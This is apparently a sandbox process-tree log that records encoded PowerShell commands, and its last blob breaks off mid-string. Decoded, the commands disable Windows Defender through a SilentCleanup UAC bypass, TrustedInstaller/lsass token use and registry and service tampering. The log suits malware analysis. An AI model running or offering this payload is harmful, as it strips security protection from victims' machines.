AJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
        9⤵
        
        PID:6204
        
        C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" qc windefend
        10⤵
        Launches sc.exe
        
        PID:3488
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
        10⤵
        
        PID:4680
        
        C:\Windows\system32\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups
        10⤵
        
        PID:4180
        
        C:\Windows\system32\net1.exe
        
        "C:\Windows\system32\net1.exe" start TrustedInstaller
        10⤵
        
        PID:5784
        
        C:\Windows\system32\net1.exe
        
        "C:\Windows\system32\net1.exe" start lsass
        10⤵
        
        PID:5432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcg